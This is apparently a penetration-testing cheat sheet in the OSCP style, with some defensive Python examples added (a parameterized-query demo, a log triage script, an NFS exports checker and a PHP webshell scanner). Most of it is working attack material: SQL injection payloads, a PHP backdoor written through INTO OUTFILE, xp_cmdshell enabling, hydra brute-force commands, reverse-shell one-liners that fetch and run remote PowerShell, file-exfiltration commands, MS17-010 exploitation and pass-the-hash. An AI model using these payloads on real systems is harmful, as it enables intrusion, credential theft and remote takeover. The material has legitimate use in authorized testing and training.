- Web application
- Services
- Password Attacks
- SMB and NETBIOS
- NFS Shares
- All the Shells
- File transfers
- Misc
When modifying web exploits, there are several key questions we generally need to ask while approaching the code:
- Does it initiate an HTTP or HTTPS connection?
- Does it access a web-application-specific path or route?
- Does the exploit leverage a pre-authentication vulnerability?
- If not, how does the exploit authenticate to the web application?
- How are the GET or POST requests crafted to trigger and exploit the vulnerability?
- Does it rely on default application settings (such as the web path of the application) that may have been changed after installation?
- Will oddities such as self-signed certificates disrupt the exploit?
- Use `'` and `"` to look for possible errors.
- Use `#` and `--` for comments after the injection. After the `--` a space is required; if the `--` is in a URL, add something behind it so the space doesn't get truncated, for example `-- \\`.
- If returning multiple rows gives errors, use `LIMIT 1` in the query.
- Use `ORDER BY` to find the number of columns. Increment it by 1 until no output is shown.
- Use `load_file('C:/Windows/System32/drivers/etc/hosts')` to load files instead of database data.
- Use `"<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE '<PATH TO WEBROOT>/backdoor.php'` to create a simple PHP backdoor.
- https://www.hackingarticles.in/manual-sql-injection-exploitation-step-step/
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
- Find the SQL injection
  - Use `'` and `"` to look for possible errors. A vulnerable value, for example, is `artist=1`.
- Find the number of columns
  - Use `artist=1 ORDER BY 1`. Increment it by 1 until no output or an error is given. If `artist=1 ORDER BY 4` gives an error, the number of columns is 3.
- Use a union-based SQL injection
  - Use `artist=1 union select 1,2,3` (one value per column). If no other output is shown, use a value that matches no row so the injected row is displayed: `artist=-1 union select 1,2,3`
  - If it's a string, use `artist=-1 union select NULL,NULL,NULL`
- Fetch the name of the database and the version/current user
  - `artist=-1 union select 1,database(),3`
  - `-1 union select 1,version(),current_user()`
- Fetch the table names inside the database
  - Retrieve all table names: `artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()`
  - Get the first table name (limited to the first by `limit 0,1`): `artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1`
  - Get the second table name (limited to the second by `limit 1,1`): `artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1`
  - Get the rest of the table names the same way, incrementing the offset.
- Retrieve column names: `artist=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='<TABLE>'`
- Get data out of the columns: `artist=-1 union select 1,group_concat(<COLUMN>),3 from <TABLE>`
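As an added illustration from the defensive side (this is not part of the original notes), here is the `artist` lookup built two ways in Python so the UNION technique above can be seen working against one and failing against the other. It uses an in-memory SQLite database as a stand-in for the MySQL back end the walkthrough targets; the `artists` and `users` tables, their columns and rows are all constructed for the demo.

```python
"""Added example, not from the original cheat sheet: the same lookup built
with string concatenation and with a bound parameter, run against an
in-memory SQLite database (stand-in for MySQL). Schema and rows are
constructed for this demo."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample schema: a public 'artists' table and a 'users' table
    # that the application never meant to expose through this endpoint.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE artists (aid INTEGER, aname TEXT, adesc TEXT);
        INSERT INTO artists VALUES (1, 'Lena', 'painter'), (2, 'Sam', 'sculptor');
        CREATE TABLE users (uid INTEGER, uname TEXT, pwhash TEXT);
        INSERT INTO users VALUES (1, 'admin', 'hunter2-hash');
    """)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, artist: str) -> list:
    # The user-controlled value is pasted straight into the statement, so a
    # value such as '-1 union select ...' changes the structure of the query.
    sql = "SELECT aid, aname, adesc FROM artists WHERE aid=" + artist
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, artist: str) -> list:
    # The value travels as a bound parameter and is never parsed as SQL.
    # SQLite applies numeric affinity when comparing the INTEGER column with
    # the bound string, so '1' still matches row 1 while a non-numeric
    # string matches nothing.
    sql = "SELECT aid, aname, adesc FROM artists WHERE aid=?"
    return conn.execute(sql, (artist,)).fetchall()


# Constructed payload in the shape used on this page (SQLite has no
# information_schema, so the demo pulls from the constructed users table).
PAYLOAD = "-1 union select 1,uname,pwhash from users"


def demo() -> dict:
    """Run both lookups with a normal value and with the injected value."""
    conn = make_db()
    return {
        "vuln_normal": lookup_vulnerable(conn, "1"),
        "vuln_injected": lookup_vulnerable(conn, PAYLOAD),
        "param_normal": lookup_parameterized(conn, "1"),
        "param_injected": lookup_parameterized(conn, PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The parameterized version does not strip or reject anything; it simply never lets the value become part of the statement, which is why no blocklist of `union` or `order by` is needed on the server side.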
```sql
show grants;
show variables;
show databases;
use <DATABASE>;
show tables;
describe <TABLE>;
SELECT * FROM <TABLE>;
```
```bash
mssql-cli -S 10.11.1.31 -U sa -P 'poiuytrewq'
```

```sql
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
xp_cmdshell 'whoami';
```
- Is the webserver running IIS, PHP or Java? What is it running?
  - IIS = .asp, .aspx
  - PHP = .php
  - Java = .jsp
- Extension wordlist: `/opt/SecLists/Discovery/Web-Content/web-extensions.txt`
- Check if anonymous login is allowed (anonymous:anonymous).

```bash
nc -nvC <IP> <PORT>
USER <USERNAME>
PASS <PASSWORD>
LIST
RETR 1
RETR 2
```
```bash
evil-winrm -u <USER> -p <PASS> -i <IP>
```
https://github.com/danielmiessler/SecLists
```bash
hydra -L <USERNAMEFILE> -P <PASSWORDFILE> -t 24 ftp://<IP>:<PORT>
hydra -L <USERNAMEFILE> -P <PASSWORDFILE> -t 24 ssh://<IP>:<PORT>
```

Log in using Burp, or check the request in the browser's developer tools, to get the required information: you need the username, password and login parameter names and the error message shown on a failed login.
https://redteamtutorials.com/2018/10/25/hydra-brute-force-https/
```bash
hydra -L <USERNAMEFILE> -P <PASSWORDFILE> <IP> http-post-form "<LOGINPAGE>:<COOKIES FROM BURP AND SET ^USER^ AND ^PASS^>:<ERROR MESSAGE FAILED LOGIN>"
#EXAMPLE hydra -L usernames.txt -P passwords.txt 192.168.2.62 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login Failed"
#EXAMPLE hydra -l admin -P /opt/SecLists/Passwords/xato-net-10-million-passwords-100.txt 10.10.175.0 http-post-form '/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=u8hdjDohYmqfI8o0z7Cev4b1u0jLmv9dNA9NS95wDsZeMYw6zBFeyhiLx1QuOsZ%2FXV%2Fo%2BrCdXSC4Y7%2FueaRnmboaQQ9KZQWLME84zysowmYTAW8Kea1%2Bp7phoEwMiICbLwPPteDEYl7z6nobm8x1Mb2hMDiTpDJhracgmTh%2BJwP1Rqqt&__EVENTVALIDATION=QJmkftZnDEcQIPsstxYKnQBDsulZLsB0kmrbMa4BPzAc%2FMEDChrOmztni5OWBx83r2xGNndCAgw6wJ%2F%2FoAzYtZEcyRWC%2FaPyUR5iWSO0V8%2FIodobow1OxiuoD9uZVnVO8tcQZr3NWYjFcOVxYg5WAWvPyezvfcBk2oxUdZwsutPATiKB&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:failed'
```
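Added example from the defender's side (not from these notes and not part of hydra): what the `http-post-form` run above and the UNION/ORDER BY probing earlier on this page look like in a web server's combined-format access log, with a small triage script that flags both. The log lines, addresses and paths are constructed; the login path `/dvwa/login.php` mirrors the hydra example, and the status-code pattern (200 with the error page on failure, 302 on success) is an assumption about that application.

```python
"""Added example, not from the original notes: triage of combined-format
access log lines for (a) UNION / ORDER BY / information_schema probes in
query strings and (b) bursts of POSTs to a login page from one source.
All log lines, IPs and paths below are constructed."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote_plus

# Constructed sample access log (Apache/nginx combined format, trimmed to
# the fields this script uses).
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2024:10:00:01 +0000] "GET /artists.php?artist=1 HTTP/1.1" 200 512
10.0.0.9 - - [12/May/2024:10:00:02 +0000] "GET /artists.php?artist=1%20ORDER%20BY%204 HTTP/1.1" 500 231
10.0.0.9 - - [12/May/2024:10:00:03 +0000] "GET /artists.php?artist=-1%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables HTTP/1.1" 200 900
10.0.0.9 - - [12/May/2024:10:01:00 +0000] "POST /dvwa/login.php HTTP/1.1" 200 1337
10.0.0.9 - - [12/May/2024:10:01:01 +0000] "POST /dvwa/login.php HTTP/1.1" 200 1337
10.0.0.9 - - [12/May/2024:10:01:02 +0000] "POST /dvwa/login.php HTTP/1.1" 200 1337
10.0.0.9 - - [12/May/2024:10:01:03 +0000] "POST /dvwa/login.php HTTP/1.1" 200 1337
10.0.0.9 - - [12/May/2024:10:01:04 +0000] "POST /dvwa/login.php HTTP/1.1" 200 1337
10.0.0.9 - - [12/May/2024:10:01:05 +0000] "POST /dvwa/login.php HTTP/1.1" 302 0
10.0.0.5 - - [12/May/2024:10:05:00 +0000] "POST /dvwa/login.php HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
# Patterns from the manual walkthrough on this page, matched after URL decoding.
SQLI_RE = re.compile(r"\b(union\s+(all\s+)?select|order\s+by\s+\d+|information_schema)\b", re.I)


def parse_line(line: str):
    """Return a dict with ip, ts (aware datetime), method, decoded path, status; None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["path"] = unquote_plus(rec["path"])  # %20 and '+' become spaces before matching
    return rec


def find_sqli_probes(lines):
    """(ip, decoded path) for every request whose path matches SQLI_RE."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and SQLI_RE.search(rec["path"]):
            hits.append((rec["ip"], rec["path"]))
    return hits


def find_login_bursts(lines, login_path, threshold=5, window_s=60):
    """Map ip -> largest number of POSTs to login_path seen in any window_s
    second sliding window, for ips reaching threshold."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].split("?")[0] == login_path:
            per_ip[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        best, start = 0, 0
        for end, t in enumerate(times):
            while (t - times[start]).total_seconds() > window_s:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


def triage(log_text: str, login_path: str = "/dvwa/login.php") -> dict:
    lines = log_text.splitlines()
    return {"sqli": find_sqli_probes(lines), "bursts": find_login_bursts(lines, login_path)}


if __name__ == "__main__":
    print(triage(SAMPLE_LOG))
```

The burst detector counts every POST to the login path rather than only failures, because "what a failure looks like" (here a 200 carrying the error text versus a 302 on success) is application-specific; with that knowledge you can filter on `rec["status"]` before counting. Request bodies are not logged, so the `^USER^`/`^PASS^` values themselves never appear; the signal is the rate and the single source.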
```bash
cewl <URL> -m <MIN CHARS> -w <FILE>.txt
hashid <HASH>
hash-identifier
unshadow <PASSWD FILE> <SHADOW FILE> > unshadow.txt
```
Portmapper and RPCBind run on TCP port 111.

```bash
rpcinfo <IP>
sudo nmap -sSUC -p111 <IP> --script *nfs*
showmount -e <IP>
sudo mount -o nolock <IP>:/<SHARE> <MOUNT LOCATION>
sudo mount -t cifs -o port=<PORT>,username=<USERNAME>,password=<PASSWORD> //<IP>/<SHARE> /mnt/<FOLDER>
```

If a file is found which we want to access but don't have permissions for: make a user with the same username and change its UID to match, then switch to that user so we can access the file.

```bash
sudo adduser pwn
sudo vim /etc/passwd
```
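Added example from the server side (not part of the original notes): the UID trick above works because an NFS export that honours client-supplied UIDs trusts whatever user the client claims to be. The checker below parses `/etc/exports` lines and flags the settings that make that possible: `no_root_squash`, exports open to every host, and read-write exports without `all_squash`. The export lines are constructed for the demo; the option names are the standard `exports(5)` ones.

```python
"""Added example, not from the original notes: flag /etc/exports entries
whose options let a client choose its own UID (no all_squash), keep remote
root as uid 0 (no_root_squash), or export to any host. The sample exports
file is constructed for this demo."""
import re

# Constructed sample /etc/exports
SAMPLE_EXPORTS = """\
# constructed sample /etc/exports
/srv/backup   10.10.1.0/24(rw,sync,no_root_squash)
/srv/public   *(ro,sync)
/srv/home     10.10.1.20(rw,sync,root_squash)
/srv/shared   *(rw,sync,all_squash,anonuid=65534,anongid=65534)
"""

ENTRY_RE = re.compile(r"^(?P<path>\S+)\s+(?P<clients>.+)$")
# one client spec: host or network, optionally followed by (opt,opt,...)
CLIENT_RE = re.compile(r"(?P<host>[^\s(]+)(?:\((?P<opts>[^)]*)\))?")


def parse_exports(text: str):
    """Return a list of (path, host, set_of_options) for every client spec."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        for c in CLIENT_RE.finditer(m.group("clients")):
            opts = set(filter(None, (c.group("opts") or "").split(",")))
            entries.append((m.group("path"), c.group("host"), opts))
    return entries


def check_exports(text: str):
    """Return (path, host, finding) tuples for risky export options."""
    findings = []
    for path, host, opts in parse_exports(text):
        # exportfs defaults are ro and root_squash unless overridden
        if "no_root_squash" in opts:
            findings.append((path, host, "no_root_squash: remote root keeps uid 0"))
        if host in ("*", "0.0.0.0/0"):
            findings.append((path, host, "exported to every host"))
        if "rw" in opts and "all_squash" not in opts:
            findings.append((path, host, "rw without all_squash: client-chosen UIDs are honoured"))
    return findings


if __name__ == "__main__":
    for path, host, msg in check_exports(SAMPLE_EXPORTS):
        print(f"{path} {host}: {msg}")
```

`root_squash` alone only remaps UID 0; a client that presents any other UID is still taken at its word, which is exactly what creating a local user with a matching UID exploits. `all_squash` with a dedicated `anonuid`/`anongid` removes that trust for every client UID.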
- msfvenom https://netsec.ws/?p=331
```bash
sudo nc -nlvp <PORT>
sudo socat -d -d TCP4-LISTEN:<PORT> STDOUT
```

```bash
msfconsole
use multi/handler
set payload <PAYLOAD>
run
```

```powershell
. ./powercat.ps1
powercat -l -v -p 10000
```
- Generator tool https://github.com/mthbernardes/rsg
```bash
nc -nv <IP> <PORT> -e /bin/bash
socat TCP4:<IP>:<PORT> EXEC:/bin/bash
```

```powershell
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell.exe iex (iwr http://<IP>/Invoke-PowerShellTcp.ps1 -usebasicparsing);Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <PORT>
powershell iex (New-Object Net.WebClient).DownloadString('http://<IP>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <PORT>
powercat -c <IP> -p <PORT> -e cmd.exe
```

```bash
nc -nlvp <PORT>
```

```powershell
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('<IP>',<PORT>);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
powercat -l -p <PORT> -e cmd.exe
```
```bash
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
```
- In your active shell, press `bg` to send your nc session to the background.
- Enter `stty raw -echo`.
- Enter `fg` to bring your nc session back to the foreground.
- `export TERM=xterm-256color`
```bash
sudo service apache2 start               # files in /var/www/html
sudo python3 -m http.server <PORT>       # files in current directory
sudo python2 -m SimpleHTTPServer <PORT>
sudo php -S 0.0.0.0:<PORT>
sudo ruby -run -e httpd . -p <PORT>
sudo busybox httpd -f -p <PORT>
wget http://<IP>:<PORT>/<FILE>
```

```bash
sudo python3 /opt/oscp/impacket/examples/smbserver.py <SHARE NAME> <PATH>
```

```bat
dir \\<IP>\<SHARE NAME>
copy \\<IP>\<SHARE NAME>\<FILE NAME> <FILE>
copy \\<IP>\<SHARE NAME>\<FILE NAME>\*.* .
copy <FILE> \\<IP>\<SHARE NAME>\<FILE NAME>
```
If installed, use the ftp package. Use the native program with the `-s` parameter to read the commands from an input file.

```bat
echo open 192.168.119.124 21> ftp.txt
echo USER offsec>> ftp.txt
echo lab>> ftp.txt
echo bin >> ftp.txt
echo GET accesschk.exe >> ftp.txt
echo GET winPEASany.exe >> ftp.txt
echo quit >> ftp.txt
ftp -v -n -s:ftp.txt
```
Create the VBS script:

```bat
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
```

Run the VBS script to download a file:

```bat
cscript wget.vbs http://<IP>/<FILE> <FILE>
```
```powershell
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/<FILE>', '<FILE>')
powershell -c "Invoke-WebRequest -Uri 'http://<IP>/<FILE>' -OutFile 'C:\Windows\Temp\<FILE>'"
```

```bash
nc -nlvp <PORT> > <FILE>          # receiving side
nc -nv <IP> <PORT> < <FILE>       # sending side
sudo socat TCP4-LISTEN:<PORT>,fork file:<FILE>
socat TCP4:<IP>:<PORT> file:<FILE>,create
```

```powershell
powercat -c <IP> -p <PORT> -i <FILE>
```
Create `/var/www/upload.php` on Kali:

```php
<?php
$uploaddir = '/var/www/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
?>
```

Upload the file from the Windows client:

```powershell
powershell (New-Object System.Net.WebClient).UploadFile('http://<IP>/upload.php', '<FILE>')
```
Install tftp on Kali:

```bash
sudo apt update && sudo apt install atftp
sudo mkdir /tftp
sudo chown nobody: /tftp
sudo atftpd --daemon --port 69 /tftp
```

On the Windows client, to send a file:

```bat
tftp -i <IP> put important.docx
```

```powershell
powercat -c <IP> -p <PORT> -i <FILE>
```
```bash
git clone https://github.com/helviojunior/MS17-010
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
nc -lnvp <PORT>
python send_and_execute.py <TARGET IP> ms17-010.exe
```
```php
<?php
// Returns the listing of the directory where the file runs (Windows)
system("dir");
?>
```

```php
<?php
// Executes but returns nothing
exec("ls -la");
?>
```

```php
<?php
// Executes, returns the entire output as a string
echo shell_exec("ls -la");
?>
```

```php
<?php
// Executes, returns output in raw format
passthru("ls -la");
?>
```
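Added example from the detection side (not part of the original notes): the one-liner backdoor earlier on this page and the four snippets above all share one shape, a PHP command-execution function fed from request input. The scanner below flags that shape in PHP source, including the one-step indirection where the request value is first stored in a variable. The four sample files are constructed strings; the scanner is a review heuristic (a regex, not a PHP parser), so treat hits as leads.

```python
"""Added example, not from the original notes: a heuristic scanner for PHP
source that flags command-execution functions (system, exec, shell_exec,
passthru, popen, proc_open) and marks a call as tainted when its argument
contains request input ($_GET/$_POST/$_REQUEST/$_COOKIE) directly or via a
variable assigned from it. Sample files are constructed for this demo."""
import re

EXEC_FUNCS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open")
CALL_RE = re.compile(r"\b(" + "|".join(EXEC_FUNCS) + r")\s*\((?P<args>[^;]*)\)", re.I)
INPUT_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
# "$var = ... $_GET[...]" style assignments: one-step taint propagation
ASSIGN_RE = re.compile(r"(\$\w+)\s*=\s*[^;]*\$_(GET|POST|REQUEST|COOKIE)\b")

# Constructed sample PHP files
SAMPLES = {
    "backdoor.php": "<?php echo shell_exec($_GET['cmd']);?>",
    "indirect.php": "<?php\n$c = $_POST['c'];\nsystem($c);\n?>",
    "static.php": "<?php\n// fixed command, no request input\npassthru(\"ls -la\");\n?>",
    "clean.php": "<?php\necho htmlspecialchars($_GET['name']);\n?>",
}


def tainted_vars(source: str) -> set:
    """Names of variables assigned (in whole or part) from request input."""
    return {m.group(1) for m in ASSIGN_RE.finditer(source)}


def scan_php(source: str) -> list:
    """Return one finding per exec-function call: line, function, tainted flag."""
    tainted = tainted_vars(source)
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in CALL_RE.finditer(line):
            args = m.group("args")
            is_tainted = bool(INPUT_RE.search(args)) or any(
                re.search(re.escape(v) + r"\b", args) for v in tainted
            )
            findings.append({"line": lineno, "func": m.group(1).lower(), "tainted": is_tainted})
    return findings


def scan_all(files: dict) -> dict:
    """Scan a {filename: source} mapping; files with no exec calls map to []."""
    return {name: scan_php(src) for name, src in files.items()}


if __name__ == "__main__":
    for name, findings in scan_all(SAMPLES).items():
        print(name, findings)
```

`static.php` is still reported, with `tainted` set to `False`: an exec call with a fixed argument is worth a look in a webroot even when no request data reaches it, while the two tainted hits are the ones to escalate first. Obfuscated shells (`base64_decode`, string concatenation, variable functions like `$f($x)`) slip past this regex, which is why it is a first pass and not a verdict.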
https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/
The first uses an empty LM hash; the last one should work as well.

```bash
pth-winexe -U <USERNAME>%aad3b435b51404eeaad3b435b51404ee:<NTLM HASH> //<IP> cmd
pth-winexe -U <USERNAME>%<LM HASH>:<NTLM HASH> //<IP> cmd
pth-winexe -U <USERNAME>%:<NTLM HASH> //<IP> cmd
```
https://www.exploit-db.com/exploits/46249
Start a /bin/bash shell without tmux:

```bash
nc -lvp <PORT>
python -c 'import pty;pty.spawn("/bin/bash")'
# press Ctrl+Z
stty raw -echo
fg
export TERM=screen
```